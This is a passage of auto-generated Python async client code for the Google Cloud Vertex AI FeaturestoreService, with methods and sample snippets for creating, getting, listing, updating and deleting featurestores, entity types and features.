retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name, force])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.DeleteFeaturestoreRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
if force is not None:
request.force = force
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.delete_featurestore,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
empty_pb2.Empty,
metadata_type=gca_operation.DeleteOperationMetadata,
)
# Done; return the response.
return response
async def create_entity_type(
self,
request: Optional[
Union[featurestore_service.CreateEntityTypeRequest, dict]
] = None,
*,
parent: Optional[str] = None,
entity_type: Optional[gca_entity_type.EntityType] = None,
entity_type_id: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Creates a new EntityType in a given Featurestore.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_create_entity_type():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.CreateEntityTypeRequest(
parent="parent_value",
entity_type_id="entity_type_id_value",
)
# Make the request
operation = client.create_entity_type(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.CreateEntityTypeRequest, dict]]):
The request object. Request message for
[FeaturestoreService.CreateEntityType][google.cloud.aiplatform.v1beta1.FeaturestoreService.CreateEntityType].
parent (:class:`str`):
Required. The resource name of the Featurestore to
create EntityTypes. Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
entity_type (:class:`google.cloud.aiplatform_v1beta1.types.EntityType`):
The EntityType to create.
This corresponds to the ``entity_type`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
entity_type_id (:class:`str`):
Required. The ID to use for the EntityType, which will
become the final component of the EntityType's resource
name.
This value may be up to 60 characters, and valid
characters are ``[a-z0-9_]``. The first character cannot
be a number.
The value must be unique within a featurestore.
This corresponds to the ``entity_type_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1beta1.types.EntityType` An entity type is a type of object in a system that needs to be modeled and
have stored information about. For example, driver is
an entity type, and driver0 is an instance of an
entity type driver.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, entity_type, entity_type_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.CreateEntityTypeRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if entity_type is not None:
request.entity_type = entity_type
if entity_type_id is not None:
request.entity_type_id = entity_type_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.create_entity_type,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
gca_entity_type.EntityType,
metadata_type=featurestore_service.CreateEntityTypeOperationMetadata,
)
# Done; return the response.
return response
async def get_entity_type(
self,
request: Optional[
Union[featurestore_service.GetEntityTypeRequest, dict]
] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> entity_type.EntityType:
r"""Gets details of a single EntityType.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_get_entity_type():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.GetEntityTypeRequest(
name="name_value",
)
# Make the request
response = await client.get_entity_type(request=request)
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.GetEntityTypeRequest, dict]]):
The request object. Request message for
[FeaturestoreService.GetEntityType][google.cloud.aiplatform.v1beta1.FeaturestoreService.GetEntityType].
name (:class:`str`):
Required. The name of the EntityType resource. Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}/entityTypes/{entity_type}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1beta1.types.EntityType:
An entity type is a type of object in
a system that needs to be modeled and
have stored information about. For
example, driver is an entity type, and
driver0 is an instance of an entity type
driver.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.GetEntityTypeRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.get_entity_type,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def list_entity_types(
self,
request: Optional[
Union[featurestore_service.ListEntityTypesRequest, dict]
] = None,
*,
parent: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListEntityTypesAsyncPager:
r"""Lists EntityTypes in a given Featurestore.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_list_entity_types():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.ListEntityTypesRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_entity_types(request=request)
# Handle the response
async for response in page_result:
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.ListEntityTypesRequest, dict]]):
The request object. Request message for
[FeaturestoreService.ListEntityTypes][google.cloud.aiplatform.v1beta1.FeaturestoreService.ListEntityTypes].
parent (:class:`str`):
Required. The resource name of the Featurestore to list
EntityTypes. Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1beta1.services.featurestore_service.pagers.ListEntityTypesAsyncPager:
Response message for
[FeaturestoreService.ListEntityTypes][google.cloud.aiplatform.v1beta1.FeaturestoreService.ListEntityTypes].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.ListEntityTypesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.list_entity_types,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# This method is paged; wrap the response in a pager, which provides
# an `__aiter__` convenience method.
response = pagers.ListEntityTypesAsyncPager(
method=rpc,
request=request,
response=response,
metadata=metadata,
)
# Done; return the response.
return response
async def update_entity_type(
self,
request: Optional[
Union[featurestore_service.UpdateEntityTypeRequest, dict]
] = None,
*,
entity_type: Optional[gca_entity_type.EntityType] = None,
update_mask: Optional[field_mask_pb2.FieldMask] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> gca_entity_type.EntityType:
r"""Updates the parameters of a single EntityType.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_update_entity_type():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.UpdateEntityTypeRequest(
)
# Make the request
response = await client.update_entity_type(request=request)
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.UpdateEntityTypeRequest, dict]]):
The request object. Request message for
[FeaturestoreService.UpdateEntityType][google.cloud.aiplatform.v1beta1.FeaturestoreService.UpdateEntityType].
entity_type (:class:`google.cloud.aiplatform_v1beta1.types.EntityType`):
Required. The EntityType's ``name`` field is used to
identify the EntityType to be updated. Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}/entityTypes/{entity_type}``
This corresponds to the ``entity_type`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (:class:`google.protobuf.field_mask_pb2.FieldMask`):
Field mask is used to specify the fields to be
overwritten in the EntityType resource by the update.
The fields specified in the update_mask are relative to
the resource, not the full request. A field will be
overwritten if it is in the mask. If the user does not
provide a mask then only the non-empty fields present in
the request will be overwritten. Set the update_mask to
``*`` to override all fields.
Updatable fields:
- ``description``
- ``labels``
- ``monitoring_config.snapshot_analysis.disabled``
- ``monitoring_config.snapshot_analysis.monitoring_interval_days``
- ``monitoring_config.snapshot_analysis.staleness_days``
- ``monitoring_config.import_features_analysis.state``
- ``monitoring_config.import_features_analysis.anomaly_detection_baseline``
- ``monitoring_config.numerical_threshold_config.value``
- ``monitoring_config.categorical_threshold_config.value``
- ``offline_storage_ttl_days``
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1beta1.types.EntityType:
An entity type is a type of object in
a system that needs to be modeled and
have stored information about. For
example, driver is an entity type, and
driver0 is an instance of an entity type
driver.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([entity_type, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.UpdateEntityTypeRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if entity_type is not None:
request.entity_type = entity_type
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.update_entity_type,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("entity_type.name", request.entity_type.name),)
),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def delete_entity_type(
self,
request: Optional[
Union[featurestore_service.DeleteEntityTypeRequest, dict]
] = None,
*,
name: Optional[str] = None,
force: Optional[bool] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Deletes a single EntityType. The EntityType must not have any
Features or ``force`` must be set to true for the request to
succeed.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_delete_entity_type():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.DeleteEntityTypeRequest(
name="name_value",
)
# Make the request
operation = client.delete_entity_type(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.DeleteEntityTypeRequest, dict]]):
The request object. Request message for
[FeaturestoreService.DeleteEntityTypes][].
name (:class:`str`):
Required. The name of the EntityType to be deleted.
Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}/entityTypes/{entity_type}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
force (:class:`bool`):
If set to true, any Features for this
EntityType will also be deleted.
(Otherwise, the request will only work
if the EntityType has no Features.)
This corresponds to the ``force`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.protobuf.empty_pb2.Empty` A generic empty message that you can re-use to avoid defining duplicated
empty messages in your APIs. A typical example is to
use it as the request or the response type of an API
method. For instance:
service Foo {
rpc Bar(google.protobuf.Empty) returns
(google.protobuf.Empty);
}
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name, force])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.DeleteEntityTypeRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
if force is not None:
request.force = force
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.delete_entity_type,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
empty_pb2.Empty,
metadata_type=gca_operation.DeleteOperationMetadata,
)
# Done; return the response.
return response
async def create_feature(
self,
request: Optional[
Union[featurestore_service.CreateFeatureRequest, dict]
] = None,
*,
parent: Optional[str] = None,
feature: Optional[gca_feature.Feature] = None,
feature_id: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Creates a new Feature in a given EntityType.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_create_feature():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
feature = aiplatform_v1beta1.Feature()
feature.value_type = "BYTES"
request = aiplatform_v1beta1.CreateFeatureRequest(
parent="parent_value",
feature=feature,
feature_id="feature_id_value",
)
# Make the request
operation = client.create_feature(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.CreateFeatureRequest, dict]]):
The request object. Request message for
[FeaturestoreService.CreateFeature][google.cloud.aiplatform.v1beta1.FeaturestoreService.CreateFeature].
parent (:class:`str`):
Required. The resource name of the EntityType to create
a Feature. Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}/entityTypes/{entity_type}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
feature (:class:`google.cloud.aiplatform_v1beta1.types.Feature`):
Required. The Feature to create.
This corresponds to the ``feature`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
feature_id (:class:`str`):
Required. The ID to use for the Feature, which will
become the final component of the Feature's resource
name.
This value may be up to 128 characters, and valid
characters are ``[a-z0-9_]``. The first character cannot
be a number.
The value must be unique within an EntityType.
This corresponds to the ``feature_id`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1beta1.types.Feature` Feature Metadata information that describes an attribute of an entity type.
For example, apple is an entity type, and color is a
feature that describes apple.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, feature, feature_id])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.CreateFeatureRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if feature is not None:
request.feature = feature
if feature_id is not None:
request.feature_id = feature_id
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.create_feature,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
gca_feature.Feature,
metadata_type=featurestore_service.CreateFeatureOperationMetadata,
)
# Done; return the response.
return response
async def batch_create_features(
self,
request: Optional[
Union[featurestore_service.BatchCreateFeaturesRequest, dict]
] = None,
*,
parent: Optional[str] = None,
requests: Optional[
MutableSequence[featurestore_service.CreateFeatureRequest]
] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> operation_async.AsyncOperation:
r"""Creates a batch of Features in a given EntityType.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_batch_create_features():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
requests = aiplatform_v1beta1.CreateFeatureRequest()
requests.parent = "parent_value"
requests.feature.value_type = "BYTES"
requests.feature_id = "feature_id_value"
request = aiplatform_v1beta1.BatchCreateFeaturesRequest(
parent="parent_value",
requests=requests,
)
# Make the request
operation = client.batch_create_features(request=request)
print("Waiting for operation to complete...")
response = (await operation).result()
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.BatchCreateFeaturesRequest, dict]]):
The request object. Request message for
[FeaturestoreService.BatchCreateFeatures][google.cloud.aiplatform.v1beta1.FeaturestoreService.BatchCreateFeatures].
parent (:class:`str`):
Required. The resource name of the EntityType to create
the batch of Features under. Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}/entityTypes/{entity_type}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
requests (:class:`MutableSequence[google.cloud.aiplatform_v1beta1.types.CreateFeatureRequest]`):
Required. The request message specifying the Features to
create. All Features must be created under the same
parent EntityType. The ``parent`` field in each child
request message can be omitted. If ``parent`` is set in
a child request, then the value must match the
``parent`` value in this request message.
This corresponds to the ``requests`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.api_core.operation_async.AsyncOperation:
An object representing a long-running operation.
The result type for the operation will be :class:`google.cloud.aiplatform_v1beta1.types.BatchCreateFeaturesResponse` Response message for
[FeaturestoreService.BatchCreateFeatures][google.cloud.aiplatform.v1beta1.FeaturestoreService.BatchCreateFeatures].
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, requests])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.BatchCreateFeaturesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if requests:
request.requests.extend(requests)
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.batch_create_features,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Wrap the response in an operation future.
response = operation_async.from_gapic(
response,
self._client._transport.operations_client,
featurestore_service.BatchCreateFeaturesResponse,
metadata_type=featurestore_service.BatchCreateFeaturesOperationMetadata,
)
# Done; return the response.
return response
async def get_feature(
self,
request: Optional[Union[featurestore_service.GetFeatureRequest, dict]] = None,
*,
name: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> feature.Feature:
r"""Gets details of a single Feature.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_get_feature():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.GetFeatureRequest(
name="name_value",
)
# Make the request
response = await client.get_feature(request=request)
# Handle the response
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.GetFeatureRequest, dict]]):
The request object. Request message for
[FeaturestoreService.GetFeature][google.cloud.aiplatform.v1beta1.FeaturestoreService.GetFeature].
name (:class:`str`):
Required. The name of the Feature resource. Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}/entityTypes/{entity_type}``
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1beta1.types.Feature:
Feature Metadata information that
describes an attribute of an entity
type. For example, apple is an entity
type, and color is a feature that
describes apple.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.GetFeatureRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.get_feature,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
# Done; return the response.
return response
async def list_features(
self,
request: Optional[Union[featurestore_service.ListFeaturesRequest, dict]] = None,
*,
parent: Optional[str] = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: Union[float, object] = gapic_v1.method.DEFAULT,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListFeaturesAsyncPager:
r"""Lists Features in a given EntityType.
.. code-block:: python
# This snippet has been automatically generated and should be regarded as a
# code template only.
# It will require modifications to work:
# - It may require correct/in-range values for request initialization.
# - It may require specifying regional endpoints when creating the service
# client as shown in:
# https://googleapis.dev/python/google-api-core/latest/client_options.html
from google.cloud import aiplatform_v1beta1
async def sample_list_features():
# Create a client
client = aiplatform_v1beta1.FeaturestoreServiceAsyncClient()
# Initialize request argument(s)
request = aiplatform_v1beta1.ListFeaturesRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_features(request=request)
# Handle the response
async for response in page_result:
print(response)
Args:
request (Optional[Union[google.cloud.aiplatform_v1beta1.types.ListFeaturesRequest, dict]]):
The request object. Request message for
[FeaturestoreService.ListFeatures][google.cloud.aiplatform.v1beta1.FeaturestoreService.ListFeatures].
parent (:class:`str`):
Required. The resource name of the Location to list
Features. Format:
``projects/{project}/locations/{location}/featurestores/{featurestore}/entityTypes/{entity_type}``
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.aiplatform_v1beta1.services.featurestore_service.pagers.ListFeaturesAsyncPager:
Response message for
[FeaturestoreService.ListFeatures][google.cloud.aiplatform.v1beta1.FeaturestoreService.ListFeatures].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = featurestore_service.ListFeaturesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.list_features,
default_timeout=5.0,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(
request,
retry=retry,
timeout=timeout,
metadata=metadata,
)
